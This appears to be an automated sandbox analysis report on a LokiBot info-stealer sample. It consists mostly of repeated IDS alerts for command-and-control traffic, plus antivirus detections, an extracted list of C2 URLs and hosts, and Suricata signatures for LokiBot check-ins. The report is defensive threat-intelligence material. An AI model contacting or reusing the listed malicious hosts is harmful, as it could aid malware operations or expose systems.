            2024-11-22T17:39:13.054807+010020243131Malware Command and Control Activity Detected192.168.2.44980694.156.177.4180TCP
            2024-11-22T17:39:14.727841+010020243131Malware Command and Control Activity Detected192.168.2.44980794.156.177.4180TCP
            2024-11-22T17:39:16.481024+010020243131Malware Command and Control Activity Detected192.168.2.44981494.156.177.4180TCP
            2024-11-22T17:39:18.289205+010020243131Malware Command and Control Activity Detected192.168.2.44982094.156.177.4180TCP
            2024-11-22T17:39:20.131550+010020243131Malware Command and Control Activity Detected192.168.2.44982694.156.177.4180TCP
            2024-11-22T17:39:21.922262+010020243131Malware Command and Control Activity Detected192.168.2.44983094.156.177.4180TCP
            2024-11-22T17:39:23.676175+010020243131Malware Command and Control Activity Detected192.168.2.44983494.156.177.4180TCP
            2024-11-22T17:39:25.302977+010020243131Malware Command and Control Activity Detected192.168.2.44983994.156.177.4180TCP
            2024-11-22T17:39:27.054176+010020243131Malware Command and Control Activity Detected192.168.2.44984594.156.177.4180TCP
            2024-11-22T17:39:28.889019+010020243131Malware Command and Control Activity Detected192.168.2.44985194.156.177.4180TCP
            2024-11-22T17:39:30.602180+010020243131Malware Command and Control Activity Detected192.168.2.44985394.156.177.4180TCP
            2024-11-22T17:39:32.319975+010020243131Malware Command and Control Activity Detected192.168.2.44985894.156.177.4180TCP
            2024-11-22T17:39:34.064527+010020243131Malware Command and Control Activity Detected192.168.2.44986494.156.177.4180TCP
            2024-11-22T17:39:35.909915+010020243131Malware Command and Control Activity Detected192.168.2.44986994.156.177.4180TCP
            2024-11-22T17:39:37.911435+010020243131Malware Command and Control Activity Detected192.168.2.44987594.156.177.4180TCP
            2024-11-22T17:39:39.774405+010020243131Malware Command and Control Activity Detected192.168.2.44987894.156.177.4180TCP
            2024-11-22T17:39:41.435946+010020243131Malware Command and Control Activity Detected192.168.2.44988394.156.177.4180TCP
            2024-11-22T17:39:43.209941+010020243131Malware Command and Control Activity Detected192.168.2.44988994.156.177.4180TCP
            2024-11-22T17:39:44.928389+010020243131Malware Command and Control Activity Detected192.168.2.44989494.156.177.4180TCP
            2024-11-22T17:39:46.764115+010020243131Malware Command and Control Activity Detected192.168.2.44989894.156.177.4180TCP
            2024-11-22T17:39:48.566331+010020243131Malware Command and Control Activity Detected192.168.2.44990294.156.177.4180TCP
            2024-11-22T17:39:50.496975+010020243131Malware Command and Control Activity Detected192.168.2.44990794.156.177.4180TCP
            2024-11-22T17:39:52.341897+010020243131Malware Command and Control Activity Detected192.168.2.44991394.156.177.4180TCP
            2024-11-22T17:39:54.151907+010020243131Malware Command and Control Activity Detected192.168.2.44991794.156.177.4180TCP
            2024-11-22T17:39:55.765985+010020243131Malware Command and Control Activity Detected192.168.2.44992294.156.177.4180TCP
            2024-11-22T17:39:57.517015+010020243131Malware Command and Control Activity Detected192.168.2.44992694.156.177.4180TCP
            2024-11-22T17:39:59.228879+010020243131Malware Command and Control Activity Detected192.168.2.44993294.156.177.4180TCP
            2024-11-22T17:40:01.069978+010020243131Malware Command and Control Activity Detected192.168.2.44993794.156.177.4180TCP
            2024-11-22T17:40:02.745174+010020243131Malware Command and Control Activity Detected192.168.2.44994294.156.177.4180TCP
            2024-11-22T17:40:04.526328+010020243131Malware Command and Control Activity Detected192.168.2.44994594.156.177.4180TCP
            2024-11-22T17:40:06.269586+010020243131Malware Command and Control Activity Detected192.168.2.44995194.156.177.4180TCP
            2024-11-22T17:40:08.104776+010020243131Malware Command and Control Activity Detected192.168.2.44995794.156.177.4180TCP
            2024-11-22T17:40:09.891749+010020243131Malware Command and Control Activity Detected192.168.2.44996194.156.177.4180TCP
            2024-11-22T17:40:11.557939+010020243131Malware Command and Control Activity Detected192.168.2.44996594.156.177.4180TCP
            2024-11-22T17:40:13.394137+010020243131Malware Command and Control Activity Detected192.168.2.44997094.156.177.4180TCP
            2024-11-22T17:40:15.065652+010020243131Malware Command and Control Activity Detected192.168.2.44997694.156.177.4180TCP
            2024-11-22T17:40:16.777601+010020243131Malware Command and Control Activity Detected192.168.2.44998194.156.177.4180TCP
            2024-11-22T17:40:18.529455+010020243131Malware Command and Control Activity Detected192.168.2.44998494.156.177.4180TCP
            2024-11-22T17:40:20.330214+010020243131Malware Command and Control Activity Detected192.168.2.44999094.156.177.4180TCP
            2024-11-22T17:40:22.279856+010020243131Malware Command and Control Activity Detected192.168.2.44999594.156.177.4180TCP
            2024-11-22T17:40:24.138359+010020243131Malware Command and Control Activity Detected192.168.2.45000094.156.177.4180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-22T17:38:24.937744+010020243181Malware Command and Control Activity Detected192.168.2.44973694.156.177.4180TCP
            2024-11-22T17:38:26.773102+010020243181Malware Command and Control Activity Detected192.168.2.44973894.156.177.4180TCP
            2024-11-22T17:38:28.639683+010020243181Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
            2024-11-22T17:38:30.444496+010020243181Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
            2024-11-22T17:38:32.251170+010020243181Malware Command and Control Activity Detected192.168.2.44974194.156.177.4180TCP
            2024-11-22T17:38:33.940877+010020243181Malware Command and Control Activity Detected192.168.2.44974394.156.177.4180TCP
            2024-11-22T17:38:35.739391+010020243181Malware Command and Control Activity Detected192.168.2.44974594.156.177.4180TCP
            2024-11-22T17:38:37.721603+010020243181Malware Command and Control Activity Detected192.168.2.44974894.156.177.4180TCP
            2024-11-22T17:38:39.565166+010020243181Malware Command and Control Activity Detected192.168.2.44974994.156.177.4180TCP
            2024-11-22T17:38:41.267831+010020243181Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
            2024-11-22T17:38:43.017979+010020243181Malware Command and Control Activity Detected192.168.2.44975394.156.177.4180TCP
            2024-11-22T17:38:44.821525+010020243181Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
            2024-11-22T17:38:46.587354+010020243181Malware Command and Control Activity Detected192.168.2.44975594.156.177.4180TCP
            2024-11-22T17:38:48.298382+010020243181Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
            2024-11-22T17:38:50.103232+010020243181Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
            2024-11-22T17:38:51.916181+010020243181Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
            2024-11-22T17:38:53.761108+010020243181Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
            2024-11-22T17:38:55.610382+010020243181Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
            2024-11-22T17:38:57.457422+010020243181Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
            2024-11-22T17:38:59.302710+010020243181Malware Command and Control Activity Detected192.168.2.44976894.156.177.4180TCP
            2024-11-22T17:39:01.010755+010020243181Malware Command and Control Activity Detected192.168.2.44976994.156.177.4180TCP
            2024-11-22T17:39:02.801173+010020243181Malware Command and Control Activity Detected192.168.2.44977594.156.177.4180TCP
            2024-11-22T17:39:04.480951+010020243181Malware Command and Control Activity Detected192.168.2.44978194.156.177.4180TCP
            2024-11-22T17:39:06.235877+010020243181Malware Command and Control Activity Detected192.168.2.44978794.156.177.4180TCP
            2024-11-22T17:39:07.860411+010020243181Malware Command and Control Activity Detected192.168.2.44978894.156.177.4180TCP
            2024-11-22T17:39:09.682146+010020243181Malware Command and Control Activity Detected192.168.2.44979494.156.177.4180TCP
            2024-11-22T17:39:11.305204+010020243181Malware Command and Control Activity Detected192.168.2.44980094.156.177.4180TCP
            2024-11-22T17:39:13.054807+010020243181Malware Command and Control Activity Detected192.168.2.44980694.156.177.4180TCP
            2024-11-22T17:39:14.727841+010020243181Malware Command and Control Activity Detected192.168.2.44980794.156.177.4180TCP
            2024-11-22T17:39:16.481024+010020243181Malware Command and Control Activity Detected192.168.2.44981494.156.177.4180TCP
            2024-11-22T17:39:18.289205+010020243181Malware Command and Control Activity Detected192.168.2.44982094.156.177.4180TCP
            2024-11-22T17:39:20.131550+010020243181Malware Command and Control Activity Detected192.168.2.44982694.156.177.4180TCP
            2024-11-22T17:39:21.922262+010020243181Malware Command and Control Activity Detected192.168.2.44983094.156.177.4180TCP
            2024-11-22T17:39:23.676175+010020243181Malware Command and Control Activity Detected192.168.2.44983494.156.177.4180TCP
            2024-11-22T17:39:25.302977+010020243181Malware Command and Control Activity Detected192.168.2.44983994.156.177.4180TCP
            2024-11-22T17:39:27.054176+010020243181Malware Command and Control Activity Detected192.168.2.44984594.156.177.4180TCP
            2024-11-22T17:39:28.889019+010020243181Malware Command and Control Activity Detected192.168.2.44985194.156.177.4180TCP
            2024-11-22T17:39:30.602180+010020243181Malware Command and Control Activity Detected192.168.2.44985394.156.177.4180TCP
            2024-11-22T17:39:32.319975+010020243181Malware Command and Control Activity Detected192.168.2.44985894.156.177.4180TCP
            2024-11-22T17:39:34.064527+010020243181Malware Command and Control Activity Detected192.168.2.44986494.156.177.4180TCP
            2024-11-22T17:39:35.909915+010020243181Malware Command and Control Activity Detected192.168.2.44986994.156.177.4180TCP
            2024-11-22T17:39:37.911435+010020243181Malware Command and Control Activity Detected192.168.2.44987594.156.177.4180TCP
            2024-11-22T17:39:39.774405+010020243181Malware Command and Control Activity Detected192.168.2.44987894.156.177.4180TCP
            2024-11-22T17:39:41.435946+010020243181Malware Command and Control Activity Detected192.168.2.44988394.156.177.4180TCP
            2024-11-22T17:39:43.209941+010020243181Malware Command and Control Activity Detected192.168.2.44988994.156.177.4180TCP
            2024-11-22T17:39:44.928389+010020243181Malware Command and Control Activity Detected192.168.2.44989494.156.177.4180TCP
            2024-11-22T17:39:46.764115+010020243181Malware Command and Control Activity Detected192.168.2.44989894.156.177.4180TCP
            2024-11-22T17:39:48.566331+010020243181Malware Command and Control Activity Detected192.168.2.44990294.156.177.4180TCP
            2024-11-22T17:39:50.496975+010020243181Malware Command and Control Activity Detected192.168.2.44990794.156.177.4180TCP
            2024-11-22T17:39:52.341897+010020243181Malware Command and Control Activity Detected192.168.2.44991394.156.177.4180TCP
            2024-11-22T17:39:54.151907+010020243181Malware Command and Control Activity Detected192.168.2.44991794.156.177.4180TCP
            2024-11-22T17:39:55.765985+010020243181Malware Command and Control Activity Detected192.168.2.44992294.156.177.4180TCP
            2024-11-22T17:39:57.517015+010020243181Malware Command and Control Activity Detected192.168.2.44992694.156.177.4180TCP
            2024-11-22T17:39:59.228879+010020243181Malware Command and Control Activity Detected192.168.2.44993294.156.177.4180TCP
            2024-11-22T17:40:01.069978+010020243181Malware Command and Control Activity Detected192.168.2.44993794.156.177.4180TCP
            2024-11-22T17:40:02.745174+010020243181Malware Command and Control Activity Detected192.168.2.44994294.156.177.4180TCP
            2024-11-22T17:40:04.526328+010020243181Malware Command and Control Activity Detected192.168.2.44994594.156.177.4180TCP
            2024-11-22T17:40:06.269586+010020243181Malware Command and Control Activity Detected192.168.2.44995194.156.177.4180TCP
            2024-11-22T17:40:08.104776+010020243181Malware Command and Control Activity Detected192.168.2.44995794.156.177.4180TCP
            2024-11-22T17:40:09.891749+010020243181Malware Command and Control Activity Detected192.168.2.44996194.156.177.4180TCP
            2024-11-22T17:40:11.557939+010020243181Malware Command and Control Activity Detected192.168.2.44996594.156.177.4180TCP
            2024-11-22T17:40:13.394137+010020243181Malware Command and Control Activity Detected192.168.2.44997094.156.177.4180TCP
            2024-11-22T17:40:15.065652+010020243181Malware Command and Control Activity Detected192.168.2.44997694.156.177.4180TCP
            2024-11-22T17:40:16.777601+010020243181Malware Command and Control Activity Detected192.168.2.44998194.156.177.4180TCP
            2024-11-22T17:40:18.529455+010020243181Malware Command and Control Activity Detected192.168.2.44998494.156.177.4180TCP
            2024-11-22T17:40:20.330214+010020243181Malware Command and Control Activity Detected192.168.2.44999094.156.177.4180TCP
            2024-11-22T17:40:22.279856+010020243181Malware Command and Control Activity Detected192.168.2.44999594.156.177.4180TCP
            2024-11-22T17:40:24.138359+010020243181Malware Command and Control Activity Detected192.168.2.45000094.156.177.4180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-22T17:38:20.385794+010020216411A Network Trojan was detected192.168.2.44973394.156.177.4180TCP
            2024-11-22T17:38:22.053197+010020216411A Network Trojan was detected192.168.2.44973594.156.177.4180TCP
            2024-11-22T17:38:23.667763+010020216411A Network Trojan was detected192.168.2.44973694.156.177.4180TCP
            2024-11-22T17:38:25.419739+010020216411A Network Trojan was detected192.168.2.44973894.156.177.4180TCP
            2024-11-22T17:38:27.183872+010020216411A Network Trojan was detected192.168.2.44973994.156.177.4180TCP
            2024-11-22T17:38:29.035149+010020216411A Network Trojan was detected192.168.2.44974094.156.177.4180TCP
            2024-11-22T17:38:30.844447+010020216411A Network Trojan was detected192.168.2.44974194.156.177.4180TCP
            2024-11-22T17:38:32.663838+010020216411A Network Trojan was detected192.168.2.44974394.156.177.4180TCP
            2024-11-22T17:38:34.331046+010020216411A Network Trojan was detected192.168.2.44974594.156.177.4180TCP
            2024-11-22T17:38:36.401062+010020216411A Network Trojan was detected192.168.2.44974894.156.177.4180TCP
            2024-11-22T17:38:38.111286+010020216411A Network Trojan was detected192.168.2.44974994.156.177.4180TCP
            2024-11-22T17:38:39.948025+010020216411A Network Trojan was detected192.168.2.44975194.156.177.4180TCP
            2024-11-22T17:38:41.659082+010020216411A Network Trojan was detected192.168.2.44975394.156.177.4180TCP
            2024-11-22T17:38:43.413430+010020216411A Network Trojan was detected192.168.2.44975494.156.177.4180TCP
            2024-11-22T17:38:45.199702+010020216411A Network Trojan was detected192.168.2.44975594.156.177.4180TCP
            2024-11-22T17:38:46.970645+010020216411A Network Trojan was detected192.168.2.44975694.156.177.4180TCP
            2024-11-22T17:38:48.693877+010020216411A Network Trojan was detected192.168.2.44975794.156.177.4180TCP
            2024-11-22T17:38:50.493985+010020216411A Network Trojan was detected192.168.2.44975894.156.177.4180TCP
            2024-11-22T17:38:52.309427+010020216411A Network Trojan was detected192.168.2.44975994.156.177.4180TCP
            2024-11-22T17:38:54.159922+010020216411A Network Trojan was detected192.168.2.44976094.156.177.4180TCP
            2024-11-22T17:38:56.007119+010020216411A Network Trojan was detected192.168.2.44976294.156.177.4180TCP
            2024-11-22T17:38:57.847693+010020216411A Network Trojan was detected192.168.2.44976894.156.177.4180TCP
            2024-11-22T17:38:59.730255+010020216411A Network Trojan was detected192.168.2.44976994.156.177.4180TCP
            2024-11-22T17:39:01.391645+010020216411A Network Trojan was detected192.168.2.44977594.156.177.4180TCP
            2024-11-22T17:39:03.187495+010020216411A Network Trojan was detected192.168.2.44978194.156.177.4180TCP
            2024-11-22T17:39:04.874345+010020216411A Network Trojan was detected192.168.2.44978794.156.177.4180TCP
            2024-11-22T17:39:06.624697+010020216411A Network Trojan was detected192.168.2.44978894.156.177.4180TCP
            2024-11-22T17:39:08.251882+010020216411A Network Trojan was detected192.168.2.44979494.156.177.4180TCP
            2024-11-22T17:39:10.075035+010020216411A Network Trojan was detected192.168.2.44980094.156.177.4180TCP
            2024-11-22T17:39:11.694205+010020216411A Network Trojan was detected192.168.2.44980694.156.177.4180TCP
            2024-11-22T17:39:13.452854+010020216411A Network Trojan was detected192.168.2.44980794.156.177.4180TCP
            2024-11-22T17:39:15.106129+010020216411A Network Trojan was detected192.168.2.44981494.156.177.4180TCP
            2024-11-22T17:39:16.873576+010020216411A Network Trojan was detected192.168.2.44982094.156.177.4180TCP
            2024-11-22T17:39:18.772634+010020216411A Network Trojan was detected192.168.2.44982694.156.177.4180TCP
            2024-11-22T17:39:20.515914+010020216411A Network Trojan was detected192.168.2.44983094.156.177.4180TCP
            2024-11-22T17:39:22.314600+010020216411A Network Trojan was detected192.168.2.44983494.156.177.4180TCP
            2024-11-22T17:39:24.067071+010020216411A Network Trojan was detected192.168.2.44983994.156.177.4180TCP
            2024-11-22T17:39:25.697513+010020216411A Network Trojan was detected192.168.2.44984594.156.177.4180TCP
            2024-11-22T17:39:27.435691+010020216411A Network Trojan was detected192.168.2.44985194.156.177.4180TCP
            2024-11-22T17:39:29.277428+010020216411A Network Trojan was detected192.168.2.44985394.156.177.4180TCP
            2024-11-22T17:39:30.980502+010020216411A Network Trojan was detected192.168.2.44985894.156.177.4180TCP
            2024-11-22T17:39:32.779202+010020216411A Network Trojan was detected192.168.2.44986494.156.177.4180TCP
            2024-11-22T17:39:34.454700+010020216411A Network Trojan was detected192.168.2.44986994.156.177.4180TCP
            2024-11-22T17:39:36.638264+010020216411A Network Trojan was detected192.168.2.44987594.156.177.4180TCP
            2024-11-22T17:39:38.319161+010020216411A Network Trojan was detected192.168.2.44987894.156.177.4180TCP
            2024-11-22T17:39:40.156593+010020216411A Network Trojan was detected192.168.2.44988394.156.177.4180TCP
            2024-11-22T17:39:41.832002+010020216411A Network Trojan was detected192.168.2.44988994.156.177.4180TCP
            2024-11-22T17:39:43.599899+010020216411A Network Trojan was detected192.168.2.44989494.156.177.4180TCP
            2024-11-22T17:39:45.307094+010020216411A Network Trojan was detected192.168.2.44989894.156.177.4180TCP
            2024-11-22T17:39:47.159997+010020216411A Network Trojan was detected192.168.2.44990294.156.177.4180TCP
            2024-11-22T17:39:49.169189+010020216411A Network Trojan was detected192.168.2.44990794.156.177.4180TCP
            2024-11-22T17:39:50.892509+010020216411A Network Trojan was detected192.168.2.44991394.156.177.4180TCP
            2024-11-22T17:39:52.742489+010020216411A Network Trojan was detected192.168.2.44991794.156.177.4180TCP
            2024-11-22T17:39:54.532238+010020216411A Network Trojan was detected192.168.2.44992294.156.177.4180TCP
            2024-11-22T17:39:56.154638+010020216411A Network Trojan was detected192.168.2.44992694.156.177.4180TCP
            2024-11-22T17:39:57.905221+010020216411A Network Trojan was detected192.168.2.44993294.156.177.4180TCP
            2024-11-22T17:39:59.617555+010020216411A Network Trojan was detected192.168.2.44993794.156.177.4180TCP
            2024-11-22T17:40:01.461227+010020216411A Network Trojan was detected192.168.2.44994294.156.177.4180TCP
            2024-11-22T17:40:03.120405+010020216411A Network Trojan was detected192.168.2.44994594.156.177.4180TCP
            2024-11-22T17:40:04.910450+010020216411A Network Trojan was detected192.168.2.44995194.156.177.4180TCP
            2024-11-22T17:40:06.653374+010020216411A Network Trojan was detected192.168.2.44995794.156.177.4180TCP
            2024-11-22T17:40:08.480379+010020216411A Network Trojan was detected192.168.2.44996194.156.177.4180TCP
            2024-11-22T17:40:10.283380+010020216411A Network Trojan was detected192.168.2.44996594.156.177.4180TCP
            2024-11-22T17:40:11.940390+010020216411A Network Trojan was detected192.168.2.44997094.156.177.4180TCP
            2024-11-22T17:40:13.780404+010020216411A Network Trojan was detected192.168.2.44997694.156.177.4180TCP
            2024-11-22T17:40:15.455772+010020216411A Network Trojan was detected192.168.2.44998194.156.177.4180TCP
            2024-11-22T17:40:17.167831+010020216411A Network Trojan was detected192.168.2.44998494.156.177.4180TCP
            2024-11-22T17:40:18.923857+010020216411A Network Trojan was detected192.168.2.44999094.156.177.4180TCP
            2024-11-22T17:40:20.873102+010020216411A Network Trojan was detected192.168.2.44999594.156.177.4180TCP
            2024-11-22T17:40:22.672655+010020216411A Network Trojan was detected192.168.2.45000094.156.177.4180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-22T17:38:20.385794+010028257661Malware Command and Control Activity Detected192.168.2.44973394.156.177.4180TCP
            2024-11-22T17:38:22.053197+010028257661Malware Command and Control Activity Detected192.168.2.44973594.156.177.4180TCP
            2024-11-22T17:38:23.667763+010028257661Malware Command and Control Activity Detected192.168.2.44973694.156.177.4180TCP
            2024-11-22T17:38:25.419739+010028257661Malware Command and Control Activity Detected192.168.2.44973894.156.177.4180TCP
            2024-11-22T17:38:27.183872+010028257661Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
            2024-11-22T17:38:29.035149+010028257661Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
            2024-11-22T17:38:30.844447+010028257661Malware Command and Control Activity Detected192.168.2.44974194.156.177.4180TCP
            2024-11-22T17:38:32.663838+010028257661Malware Command and Control Activity Detected192.168.2.44974394.156.177.4180TCP
            2024-11-22T17:38:34.331046+010028257661Malware Command and Control Activity Detected192.168.2.44974594.156.177.4180TCP
            2024-11-22T17:38:36.401062+010028257661Malware Command and Control Activity Detected192.168.2.44974894.156.177.4180TCP
            2024-11-22T17:38:38.111286+010028257661Malware Command and Control Activity Detected192.168.2.44974994.156.177.4180TCP
            2024-11-22T17:38:39.948025+010028257661Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
            2024-11-22T17:38:41.659082+010028257661Malware Command and Control Activity Detected192.168.2.44975394.156.177.4180TCP
            2024-11-22T17:38:43.413430+010028257661Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
            2024-11-22T17:38:45.199702+010028257661Malware Command and Control Activity Detected192.168.2.44975594.156.177.4180TCP
            2024-11-22T17:38:46.970645+010028257661Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
            2024-11-22T17:38:48.693877+010028257661Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
            2024-11-22T17:38:50.493985+010028257661Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
            2024-11-22T17:38:52.309427+010028257661Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
            2024-11-22T17:38:54.159922+010028257661Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
            2024-11-22T17:38:56.007119+010028257661Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
            2024-11-22T17:38:57.847693+010028257661Malware Command and Control Activity Detected192.168.2.44976894.156.177.4180TCP
            2024-11-22T17:38:59.730255+010028257661Malware Command and Control Activity Detected192.168.2.44976994.156.177.4180TCP
            2024-11-22T17:39:01.391645+010028257661Malware Command and Control Activity Detected192.168.2.44977594.156.177.4180TCP
            2024-11-22T17:39:03.187495+010028257661Malware Command and Control Activity Detected192.168.2.44978194.156.177.4180TCP
            2024-11-22T17:39:04.874345+010028257661Malware Command and Control Activity Detected192.168.2.44978794.156.177.4180TCP
            2024-11-22T17:39:06.624697+010028257661Malware Command and Control Activity Detected192.168.2.44978894.156.177.4180TCP
            2024-11-22T17:39:08.251882+010028257661Malware Command and Control Activity Detected192.168.2.44979494.156.177.4180TCP
            2024-11-22T17:39:10.075035+010028257661Malware Command and Control Activity Detected192.168.2.44980094.156.177.4180TCP
            2024-11-22T17:39:11.694205+010028257661Malware Command and Control Activity Detected192.168.2.44980694.156.177.4180TCP
            2024-11-22T17:39:13.452854+010028257661Malware Command and Control Activity Detected192.168.2.44980794.156.177.4180TCP
            2024-11-22T17:39:15.106129+010028257661Malware Command and Control Activity Detected192.168.2.44981494.156.177.4180TCP
            2024-11-22T17:39:16.873576+010028257661Malware Command and Control Activity Detected192.168.2.44982094.156.177.4180TCP
            2024-11-22T17:39:18.772634+010028257661Malware Command and Control Activity Detected192.168.2.44982694.156.177.4180TCP
            2024-11-22T17:39:20.515914+010028257661Malware Command and Control Activity Detected192.168.2.44983094.156.177.4180TCP
            2024-11-22T17:39:22.314600+010028257661Malware Command and Control Activity Detected192.168.2.44983494.156.177.4180TCP
            2024-11-22T17:39:24.067071+010028257661Malware Command and Control Activity Detected192.168.2.44983994.156.177.4180TCP
            2024-11-22T17:39:25.697513+010028257661Malware Command and Control Activity Detected192.168.2.44984594.156.177.4180TCP
            2024-11-22T17:39:27.435691+010028257661Malware Command and Control Activity Detected192.168.2.44985194.156.177.4180TCP
            2024-11-22T17:39:29.277428+010028257661Malware Command and Control Activity Detected192.168.2.44985394.156.177.4180TCP
            2024-11-22T17:39:30.980502+010028257661Malware Command and Control Activity Detected192.168.2.44985894.156.177.4180TCP
            2024-11-22T17:39:32.779202+010028257661Malware Command and Control Activity Detected192.168.2.44986494.156.177.4180TCP
            2024-11-22T17:39:34.454700+010028257661Malware Command and Control Activity Detected192.168.2.44986994.156.177.4180TCP
            2024-11-22T17:39:36.638264+010028257661Malware Command and Control Activity Detected192.168.2.44987594.156.177.4180TCP
            2024-11-22T17:39:38.319161+010028257661Malware Command and Control Activity Detected192.168.2.44987894.156.177.4180TCP
            2024-11-22T17:39:40.156593+010028257661Malware Command and Control Activity Detected192.168.2.44988394.156.177.4180TCP
            2024-11-22T17:39:41.832002+010028257661Malware Command and Control Activity Detected192.168.2.44988994.156.177.4180TCP
            2024-11-22T17:39:43.599899+010028257661Malware Command and Control Activity Detected192.168.2.44989494.156.177.4180TCP
            2024-11-22T17:39:45.307094+010028257661Malware Command and Control Activity Detected192.168.2.44989894.156.177.4180TCP
            2024-11-22T17:39:47.159997+010028257661Malware Command and Control Activity Detected192.168.2.44990294.156.177.4180TCP
            2024-11-22T17:39:49.169189+010028257661Malware Command and Control Activity Detected192.168.2.44990794.156.177.4180TCP
            2024-11-22T17:39:50.892509+010028257661Malware Command and Control Activity Detected192.168.2.44991394.156.177.4180TCP
            2024-11-22T17:39:52.742489+010028257661Malware Command and Control Activity Detected192.168.2.44991794.156.177.4180TCP
            2024-11-22T17:39:54.532238+010028257661Malware Command and Control Activity Detected192.168.2.44992294.156.177.4180TCP
            2024-11-22T17:39:56.154638+010028257661Malware Command and Control Activity Detected192.168.2.44992694.156.177.4180TCP
            2024-11-22T17:39:57.905221+010028257661Malware Command and Control Activity Detected192.168.2.44993294.156.177.4180TCP
            2024-11-22T17:39:59.617555+010028257661Malware Command and Control Activity Detected192.168.2.44993794.156.177.4180TCP
            2024-11-22T17:40:01.461227+010028257661Malware Command and Control Activity Detected192.168.2.44994294.156.177.4180TCP
            2024-11-22T17:40:03.120405+010028257661Malware Command and Control Activity Detected192.168.2.44994594.156.177.4180TCP
            2024-11-22T17:40:04.910450+010028257661Malware Command and Control Activity Detected192.168.2.44995194.156.177.4180TCP
            2024-11-22T17:40:06.653374+010028257661Malware Command and Control Activity Detected192.168.2.44995794.156.177.4180TCP
            2024-11-22T17:40:08.480379+010028257661Malware Command and Control Activity Detected192.168.2.44996194.156.177.4180TCP
            2024-11-22T17:40:10.283380+010028257661Malware Command and Control Activity Detected192.168.2.44996594.156.177.4180TCP
            2024-11-22T17:40:11.940390+010028257661Malware Command and Control Activity Detected192.168.2.44997094.156.177.4180TCP
            2024-11-22T17:40:13.780404+010028257661Malware Command and Control Activity Detected192.168.2.44997694.156.177.4180TCP
            2024-11-22T17:40:15.455772+010028257661Malware Command and Control Activity Detected192.168.2.44998194.156.177.4180TCP
            2024-11-22T17:40:17.167831+010028257661Malware Command and Control Activity Detected192.168.2.44998494.156.177.4180TCP
            2024-11-22T17:40:18.923857+010028257661Malware Command and Control Activity Detected192.168.2.44999094.156.177.4180TCP
            2024-11-22T17:40:20.873102+010028257661Malware Command and Control Activity Detected192.168.2.44999594.156.177.4180TCP
            2024-11-22T17:40:22.672655+010028257661Malware Command and Control Activity Detected192.168.2.45000094.156.177.4180TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: file.exeAvira: detected
            Source: http://94.156.177.41/maxzi/five/fre.phpAvira URL Cloud: Label: malware
            Source: 94.156.177.41/maxzi/five/fre.phpAvira URL Cloud: Label: malware
            Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/maxzi/five/fre.php"]}
            Source: file.exeReversingLabs: Detection: 71%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: file.exeJoe Sandbox ML: detected
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49745 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49745 -> 94.156.177.41:80
